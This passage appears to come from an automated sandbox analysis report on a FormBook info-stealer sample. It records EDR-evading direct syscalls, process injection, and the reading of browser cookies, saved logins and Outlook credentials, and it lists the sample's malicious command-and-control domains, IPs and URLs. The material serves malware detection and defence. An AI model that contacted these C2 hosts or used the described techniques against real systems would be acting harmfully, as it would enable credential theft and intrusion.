Code function: 0_2_00A680A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,

0_2_00A680A9

Source: C:\Users\user\Desktop\XeFYBYYj0w.exe	Code function: 0_2_00A3A124 SetUnhandledExceptionFilter,		0_2_00A3A124
Source: C:\Users\user\Desktop\XeFYBYYj0w.exe	Code function: 0_2_00A3A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_00A3A155

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\fZntWIwPsvXltFXeGadUlvMRdPOdaWZtaZLBrrFdufYUijSKGLHiGSUyPjh\fIydfvfomIEE.exe	NtWriteVirtualMemory: Direct from: 0x77762E3C	Jump to behavior
Source: C:\Program Files (x86)\fZntWIwPsvXltFXeGadUlvMRdPOdaWZtaZLBrrFdufYUijSKGLHiGSUyPjh\fIydfvfomIEE.exe	NtMapViewOfSection: Direct from: 0x77762D1C	Jump to behavior
Source: C:\Program Files (x86)\fZntWIwPsvXltFXeGadUlvMRdPOdaWZtaZLBrrFdufYUijSKGLHiGSUyPjh\fIydfvfomIEE.exe	NtNotifyChangeKey: Direct from: 0x77763C2C	Jump to behavior
Source: C:\Program Files (x86)\fZntWIwPsvXltFXeGadUlvMRdPOdaWZtaZLBrrFdufYUijSKGLHiGSUyPjh\fIydfvfomIEE.exe	NtCreateMutant: Direct from: 0x777635CC	Jump to behavior
Source: C:\Program Files (x86)\fZntWIwPsvXltFXeGadUlvMRdPOdaWZtaZLBrrFdufYUijSKGLHiGSUyPjh\fIydfvfomIEE.exe	NtResumeThread: Direct from: 0x777636AC	Jump to behavior
Source: C:\Program Files (x86)\fZntWIwPsvXltFXeGadUlvMRdPOdaWZtaZLBrrFdufYUijSKGLHiGSUyPjh\fIydfvfomIEE.exe	NtProtectVirtualMemory: Direct from: 0x77757B2E	Jump to behavior
Source: C:\Program Files (x86)\fZntWIwPsvXltFXeGadUlvMRdPOdaWZtaZLBrrFdufYUijSKGLHiGSUyPjh\fIydfvfomIEE.exe	NtQuerySystemInformation: Direct from: 0x77762DFC	Jump to behavior
Source: C:\Program Files (x86)\fZntWIwPsvXltFXeGadUlvMRdPOdaWZtaZLBrrFdufYUijSKGLHiGSUyPjh\fIydfvfomIEE.exe	NtAllocateVirtualMemory: Direct from: 0x77762BFC	Jump to behavior
Source: C:\Program Files (x86)\fZntWIwPsvXltFXeGadUlvMRdPOdaWZtaZLBrrFdufYUijSKGLHiGSUyPjh\fIydfvfomIEE.exe	NtReadFile: Direct from: 0x77762ADC	Jump to behavior
Source: C:\Program Files (x86)\fZntWIwPsvXltFXeGadUlvMRdPOdaWZtaZLBrrFdufYUijSKGLHiGSUyPjh\fIydfvfomIEE.exe	NtDelayExecution: Direct from: 0x77762DDC	Jump to behavior
Source: C:\Program Files (x86)\fZntWIwPsvXltFXeGadUlvMRdPOdaWZtaZLBrrFdufYUijSKGLHiGSUyPjh\fIydfvfomIEE.exe	NtWriteVirtualMemory: Direct from: 0x7776490C	Jump to behavior
Source: C:\Program Files (x86)\fZntWIwPsvXltFXeGadUlvMRdPOdaWZtaZLBrrFdufYUijSKGLHiGSUyPjh\fIydfvfomIEE.exe	NtQueryInformationProcess: Direct from: 0x77762C26	Jump to behavior
Source: C:\Program Files (x86)\fZntWIwPsvXltFXeGadUlvMRdPOdaWZtaZLBrrFdufYUijSKGLHiGSUyPjh\fIydfvfomIEE.exe	NtResumeThread: Direct from: 0x77762FBC	Jump to behavior
Source: C:\Program Files (x86)\fZntWIwPsvXltFXeGadUlvMRdPOdaWZtaZLBrrFdufYUijSKGLHiGSUyPjh\fIydfvfomIEE.exe	NtCreateUserProcess: Direct from: 0x7776371C	Jump to behavior
Source: C:\Program Files (x86)\fZntWIwPsvXltFXeGadUlvMRdPOdaWZtaZLBrrFdufYUijSKGLHiGSUyPjh\fIydfvfomIEE.exe	NtSetInformationThread: Direct from: 0x777563F9	Jump to behavior
Source: C:\Program Files (x86)\fZntWIwPsvXltFXeGadUlvMRdPOdaWZtaZLBrrFdufYUijSKGLHiGSUyPjh\fIydfvfomIEE.exe	NtAllocateVirtualMemory: Direct from: 0x77763C9C	Jump to behavior
Source: C:\Program Files (x86)\fZntWIwPsvXltFXeGadUlvMRdPOdaWZtaZLBrrFdufYUijSKGLHiGSUyPjh\fIydfvfomIEE.exe	NtSetInformationThread: Direct from: 0x77762B4C	Jump to behavior
Source: C:\Program Files (x86)\fZntWIwPsvXltFXeGadUlvMRdPOdaWZtaZLBrrFdufYUijSKGLHiGSUyPjh\fIydfvfomIEE.exe	NtQueryAttributesFile: Direct from: 0x77762E6C	Jump to behavior
Source: C:\Program Files (x86)\fZntWIwPsvXltFXeGadUlvMRdPOdaWZtaZLBrrFdufYUijSKGLHiGSUyPjh\fIydfvfomIEE.exe	NtClose: Direct from: 0x77762B6C
Source: C:\Program Files (x86)\fZntWIwPsvXltFXeGadUlvMRdPOdaWZtaZLBrrFdufYUijSKGLHiGSUyPjh\fIydfvfomIEE.exe	NtReadVirtualMemory: Direct from: 0x77762E8C	Jump to behavior
Source: C:\Program Files (x86)\fZntWIwPsvXltFXeGadUlvMRdPOdaWZtaZLBrrFdufYUijSKGLHiGSUyPjh\fIydfvfomIEE.exe	NtCreateKey: Direct from: 0x77762C6C	Jump to behavior
Source: C:\Program Files (x86)\fZntWIwPsvXltFXeGadUlvMRdPOdaWZtaZLBrrFdufYUijSKGLHiGSUyPjh\fIydfvfomIEE.exe	NtQuerySystemInformation: Direct from: 0x777648CC	Jump to behavior
Source: C:\Program Files (x86)\fZntWIwPsvXltFXeGadUlvMRdPOdaWZtaZLBrrFdufYUijSKGLHiGSUyPjh\fIydfvfomIEE.exe	NtAllocateVirtualMemory: Direct from: 0x777648EC	Jump to behavior
Source: C:\Program Files (x86)\fZntWIwPsvXltFXeGadUlvMRdPOdaWZtaZLBrrFdufYUijSKGLHiGSUyPjh\fIydfvfomIEE.exe	NtQueryVolumeInformationFile: Direct from: 0x77762F2C	Jump to behavior
Source: C:\Program Files (x86)\fZntWIwPsvXltFXeGadUlvMRdPOdaWZtaZLBrrFdufYUijSKGLHiGSUyPjh\fIydfvfomIEE.exe	NtOpenSection: Direct from: 0x77762E0C	Jump to behavior
Source: C:\Program Files (x86)\fZntWIwPsvXltFXeGadUlvMRdPOdaWZtaZLBrrFdufYUijSKGLHiGSUyPjh\fIydfvfomIEE.exe	NtDeviceIoControlFile: Direct from: 0x77762AEC	Jump to behavior
Source: C:\Program Files (x86)\fZntWIwPsvXltFXeGadUlvMRdPOdaWZtaZLBrrFdufYUijSKGLHiGSUyPjh\fIydfvfomIEE.exe	NtAllocateVirtualMemory: Direct from: 0x77762BEC	Jump to behavior
Source: C:\Program Files (x86)\fZntWIwPsvXltFXeGadUlvMRdPOdaWZtaZLBrrFdufYUijSKGLHiGSUyPjh\fIydfvfomIEE.exe	NtQueryInformationToken: Direct from: 0x77762CAC	Jump to behavior
Source: C:\Program Files (x86)\fZntWIwPsvXltFXeGadUlvMRdPOdaWZtaZLBrrFdufYUijSKGLHiGSUyPjh\fIydfvfomIEE.exe	NtTerminateThread: Direct from: 0x77762FCC	Jump to behavior
Source: C:\Program Files (x86)\fZntWIwPsvXltFXeGadUlvMRdPOdaWZtaZLBrrFdufYUijSKGLHiGSUyPjh\fIydfvfomIEE.exe	NtCreateFile: Direct from: 0x77762FEC	Jump to behavior
Source: C:\Program Files (x86)\fZntWIwPsvXltFXeGadUlvMRdPOdaWZtaZLBrrFdufYUijSKGLHiGSUyPjh\fIydfvfomIEE.exe	NtOpenFile: Direct from: 0x77762DCC	Jump to behavior
Source: C:\Program Files (x86)\fZntWIwPsvXltFXeGadUlvMRdPOdaWZtaZLBrrFdufYUijSKGLHiGSUyPjh\fIydfvfomIEE.exe	NtOpenKeyEx: Direct from: 0x77762B9C	Jump to behavior
Source: C:\Program Files (x86)\fZntWIwPsvXltFXeGadUlvMRdPOdaWZtaZLBrrFdufYUijSKGLHiGSUyPjh\fIydfvfomIEE.exe	NtSetInformationProcess: Direct from: 0x77762C5C	Jump to behavior
Source: C:\Program Files (x86)\fZntWIwPsvXltFXeGadUlvMRdPOdaWZtaZLBrrFdufYUijSKGLHiGSUyPjh\fIydfvfomIEE.exe	NtProtectVirtualMemory: Direct from: 0x77762F9C	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\XeFYBYYj0w.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Program Files (x86)\fZntWIwPsvXltFXeGadUlvMRdPOdaWZtaZLBrrFdufYUijSKGLHiGSUyPjh\fIydfvfomIEE.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\relog.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: NULL target: C:\Program Files (x86)\fZntWIwPsvXltFXeGadUlvMRdPOdaWZtaZLBrrFdufYUijSKGLHiGSUyPjh\fIydfvfomIEE.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: NULL target: C:\Program Files (x86)\fZntWIwPsvXltFXeGadUlvMRdPOdaWZtaZLBrrFdufYUijSKGLHiGSUyPjh\fIydfvfomIEE.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\relog.exe

Thread register set: target process: 2384

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\relog.exe

Thread APC queued: target process: C:\Program Files (x86)\fZntWIwPsvXltFXeGadUlvMRdPOdaWZtaZLBrrFdufYUijSKGLHiGSUyPjh\fIydfvfomIEE.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\XeFYBYYj0w.exe

Memory written: C:\Windows\SysWOW64\svchost.exe base: 275D008

Jump to behavior

Source: C:\Users\user\Desktop\XeFYBYYj0w.exe

Code function: 0_2_00A687B1 LogonUserW,

0_2_00A687B1

Source: C:\Users\user\Desktop\XeFYBYYj0w.exe

Code function: 0_2_00A13B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00A13B3A

Source: C:\Users\user\Desktop\XeFYBYYj0w.exe

Code function: 0_2_00A148D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,

0_2_00A148D7

Source: C:\Users\user\Desktop\XeFYBYYj0w.exe

Code function: 0_2_00A74C27 mouse_event,

0_2_00A74C27

Source: C:\Users\user\Desktop\XeFYBYYj0w.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\XeFYBYYj0w.exe"	Jump to behavior
Source: C:\Program Files (x86)\fZntWIwPsvXltFXeGadUlvMRdPOdaWZtaZLBrrFdufYUijSKGLHiGSUyPjh\fIydfvfomIEE.exe	Process created: C:\Windows\SysWOW64\relog.exe "C:\Windows\SysWOW64\relog.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\XeFYBYYj0w.exe

Code function: 0_2_00A67CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

0_2_00A67CAF

Source: C:\Users\user\Desktop\XeFYBYYj0w.exe

Code function: 0_2_00A6874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_00A6874B

Source: XeFYBYYj0w.exe	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: XeFYBYYj0w.exe, fIydfvfomIEE.exe, 00000005.00000002.3146074927.0000000001730000.00000002.00000001.00040000.00000000.sdmp, fIydfvfomIEE.exe, 00000005.00000000.1563931671.0000000001731000.00000002.00000001.00040000.00000000.sdmp, fIydfvfomIEE.exe, 00000007.00000000.1710711680.0000000001AC0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: fIydfvfomIEE.exe, 00000005.00000002.3146074927.0000000001730000.00000002.00000001.00040000.00000000.sdmp, fIydfvfomIEE.exe, 00000005.00000000.1563931671.0000000001731000.00000002.00000001.00040000.00000000.sdmp, fIydfvfomIEE.exe, 00000007.00000000.1710711680.0000000001AC0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: fIydfvfomIEE.exe, 00000005.00000002.3146074927.0000000001730000.00000002.00000001.00040000.00000000.sdmp, fIydfvfomIEE.exe, 00000005.00000000.1563931671.0000000001731000.00000002.00000001.00040000.00000000.sdmp, fIydfvfomIEE.exe, 00000007.00000000.1710711680.0000000001AC0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: ?Program Manager
Source: fIydfvfomIEE.exe, 00000005.00000002.3146074927.0000000001730000.00000002.00000001.00040000.00000000.sdmp, fIydfvfomIEE.exe, 00000005.00000000.1563931671.0000000001731000.00000002.00000001.00040000.00000000.sdmp, fIydfvfomIEE.exe, 00000007.00000000.1710711680.0000000001AC0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\XeFYBYYj0w.exe

Code function: 0_2_00A3862B cpuid

0_2_00A3862B

Source: C:\Users\user\Desktop\XeFYBYYj0w.exe

Code function: 0_2_00A44E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00A44E87

Source: C:\Users\user\Desktop\XeFYBYYj0w.exe

Code function: 0_2_00A51E06 GetUserNameW,

0_2_00A51E06

Source: C:\Users\user\Desktop\XeFYBYYj0w.exe

Code function: 0_2_00A43F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

0_2_00A43F3A

Source: C:\Users\user\Desktop\XeFYBYYj0w.exe

Code function: 0_2_00A149A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00A149A0

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.3149335657.00000000058F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3145337873.0000000002770000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3145033893.0000000000490000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3145403787.00000000027C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1640145384.0000000003650000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1639166335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1640191326.0000000003A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3146582486.0000000002E90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\relog.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\relog.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Source: XeFYBYYj0w.exe	Binary or memory string: WIN_81
Source: XeFYBYYj0w.exe	Binary or memory string: WIN_XP
Source: XeFYBYYj0w.exe	Binary or memory string: WIN_XPe
Source: XeFYBYYj0w.exe	Binary or memory string: WIN_VISTA
Source: XeFYBYYj0w.exe	Binary or memory string: WIN_7
Source: XeFYBYYj0w.exe	Binary or memory string: WIN_8
Source: XeFYBYYj0w.exe	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.3149335657.00000000058F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3145337873.0000000002770000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3145033893.0000000000490000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3145403787.00000000027C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1640145384.0000000003650000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1639166335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1640191326.0000000003A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3146582486.0000000002E90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\XeFYBYYj0w.exe	Code function: 0_2_00A86283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,		0_2_00A86283
Source: C:\Users\user\Desktop\XeFYBYYj0w.exe	Code function: 0_2_00A86747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		0_2_00A86747

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	2 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	2 Valid Accounts	1 Abuse Elevation Control Mechanism	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	2 Valid Accounts	3 Obfuscated Files or Information	NTDS	116 System Information Discovery	Distributed Component Object Model	21 Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	21 Access Token Manipulation	1 DLL Side-Loading	LSA Secrets	151 Security Software Discovery	SSH	3 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	412 Process Injection	2 Valid Accounts	Cached Domain Credentials	2 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Virtualization/Sandbox Evasion	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	412 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
XeFYBYYj0w.exe	65%	Virustotal		Browse
XeFYBYYj0w.exe	76%	ReversingLabs	Win32.Backdoor.FormBook
XeFYBYYj0w.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://www.mraber.dev/ixqi/?9F=TN9kbi/KmEXimVSK7kRkm1cjJuW4yHg+jZBVyY7nUo7X8XNTQ6Sf+9UR1HXDT/eLXOeLcdefCmPPvtkAMYUyfl2Biaruko68KDljX6JEffS78HWaQA9pI6q30E6ldWWZvXFcrza4Lp7u&wtE0B=1LjxZz	0%	Avira URL Cloud	safe
http://www.fzmmkj.shop/okq9/	0%	Avira URL Cloud	safe
http://www.gern.dev/xbnt/?9F=rqIPJyQOuOJXv4fbpZifam4NGQmFDlkIBDm/oxxW981wllDAxGsmTrFlhRhIH2nC7YG/ucdsY/agAUz7mNPlHSFHpTMESY5PIg2QQDYfpCfgaUZe3U6n0Vyz+dFy5VePm5+jk7AWmLgw&wtE0B=1LjxZz	0%	Avira URL Cloud	safe
http://www.thinkone.xyz/b0aw/	0%	Avira URL Cloud	safe
http://www.thinkone.xyz/b0aw/?wtE0B=1LjxZz&9F=VOu4tm+43rVZiGe4K7AcFv6we6IMDB3Zsn+bRP9LrJ7FkoQwRvlgysJ6PgYNNu0oJqR3Guk7DWW32PLwVgqLPrvuPSkYs6IWzvZ1It1WQJjP5+KmCtojeJnesOx46iHJS4Dx3Mp7sKKT	0%	Avira URL Cloud	safe
http://www.fzmmkj.shop/okq9/?wtE0B=1LjxZz&9F=PI8q+JzCRiOLWB34dIea6eHgxdHcHle1WGGbYrpy5vcnpPBpYhW1E+E28c0ZH40azQD/W5sl2JWCO69xdVXiEbuzBudp5nCUhGIegbiFnEWG6GstFFRY+32jX4CHZZoFFrpuAXy7pwuQ	0%	Avira URL Cloud	safe
http://www.l03678.xyz/798t/?9F=yTUzEcgndw7KboVFHT9arl6MXaU44mjtDVZL03kfN2SLXi32Rry3GMticKdTmzUGS/LvnIcIaX/Cuqcp6D2L1KHgDhjkH8i+BogGG+P5HmtoXOiMf53XRo99vMLso5GtXZXy7Rd2RFdT&wtE0B=1LjxZz	0%	Avira URL Cloud	safe
http://www.newbh.pro/fpja/	0%	Avira URL Cloud	safe
http://www.newbh.pro/fpja/?9F=IUuWDP5KSR42idQ8XdSlo3kXCFzmA+zBaCctSylP56Crxmno30P/P9QjtU4p0BAyo+b46pZB1tLFie03XqTXcxME3uJuUkrEHMOi0EZXDVBAbjQv6uRKQsMrbusrwUvwXjFI0Eut13DQ&wtE0B=1LjxZz	0%	Avira URL Cloud	safe
http://www.linkdex.com/bots/)	0%	Avira URL Cloud	safe
http://www.aihuzhibo.net	0%	Avira URL Cloud	safe
http://www.gern.dev/xbnt/	0%	Avira URL Cloud	safe
https://wx.longwaysun.com/app/register.php?site_id=2239&topId=62128/798t/	0%	Avira URL Cloud	safe
http://www.einpisalpace.shop/8g74/?wtE0B=1LjxZz&9F=WJ/rFpSuW7SUTonvHlYgJHet70+40/nSG+S456FFT70GKpWTD+yYW7KPXc3l6inPZ41lXlQU44ttBNcSIyPO/Awb2QEZq+eieNEXwOjUfdTJHvICblirwfj54bAbpLWz76fPuJmn0JFO	0%	Avira URL Cloud	safe
http://einpisalpace.shop/	0%	Avira URL Cloud	safe
http://www.aihuzhibo.net/lkpz/	0%	Avira URL Cloud	safe
https://wx.longwaysun.com/app/register.php?site_id=2239&topId=62128/798t/	0%	Avira URL Cloud	safe
http://www.givvjn.info/wl3x/	0%	Avira URL Cloud	safe
http://www.givvjn.info/wl3x/?9F=IDH/sxYsqLulkbctqSbdtx5w6svLFYBpNQ4SjbhBVw1Jeu7sJntH54CcC3lqE89WX7ek1cbvwkrNRP5o0zeIvIpAz78Fkv0uY+bcXdYna/YYRI4X4Lt1dDHtrJaiCZnHtgyfQjAASlTW&wtE0B=1LjxZz	0%	Avira URL Cloud	safe
http://www.einpisalpace.shop/8g74/	0%	Avira URL Cloud	safe
http://www.l03678.xyz/798t/	0%	Avira URL Cloud	safe
https://www.newbh.pro/fpja/	0%	Avira URL Cloud	safe
http://www.mraber.dev/ixqi/	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
www.aihuzhibo.net	192.186.58.31	true	true	unknown
www.aoivej.info	47.83.1.90	true	true	unknown
www.newbh.pro	176.57.65.76	true	true	unknown
mraber.dev	46.38.243.234	true	true	unknown
www.gern.dev	185.151.30.223	true	true	unknown
www.einpisalpace.shop	188.114.96.3	true	true	unknown
www.givvjn.info	47.83.1.90	true	true	unknown
www.l03678.xyz	162.218.30.235	true	true	unknown
www.thinkone.xyz	209.74.79.41	true	true	unknown
www.fzmmkj.shop	18.163.74.139	true	true	unknown
www.mraber.dev	unknown	unknown	false	unknown
www.multichaindapps.pro	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.fzmmkj.shop/okq9/	true	Avira URL Cloud: safe	unknown
http://www.thinkone.xyz/b0aw/?wtE0B=1LjxZz&9F=VOu4tm+43rVZiGe4K7AcFv6we6IMDB3Zsn+bRP9LrJ7FkoQwRvlgysJ6PgYNNu0oJqR3Guk7DWW32PLwVgqLPrvuPSkYs6IWzvZ1It1WQJjP5+KmCtojeJnesOx46iHJS4Dx3Mp7sKKT	true	Avira URL Cloud: safe	unknown
http://www.mraber.dev/ixqi/?9F=TN9kbi/KmEXimVSK7kRkm1cjJuW4yHg+jZBVyY7nUo7X8XNTQ6Sf+9UR1HXDT/eLXOeLcdefCmPPvtkAMYUyfl2Biaruko68KDljX6JEffS78HWaQA9pI6q30E6ldWWZvXFcrza4Lp7u&wtE0B=1LjxZz	true	Avira URL Cloud: safe	unknown
http://www.newbh.pro/fpja/	true	Avira URL Cloud: safe	unknown
http://www.gern.dev/xbnt/?9F=rqIPJyQOuOJXv4fbpZifam4NGQmFDlkIBDm/oxxW981wllDAxGsmTrFlhRhIH2nC7YG/ucdsY/agAUz7mNPlHSFHpTMESY5PIg2QQDYfpCfgaUZe3U6n0Vyz+dFy5VePm5+jk7AWmLgw&wtE0B=1LjxZz	true	Avira URL Cloud: safe	unknown
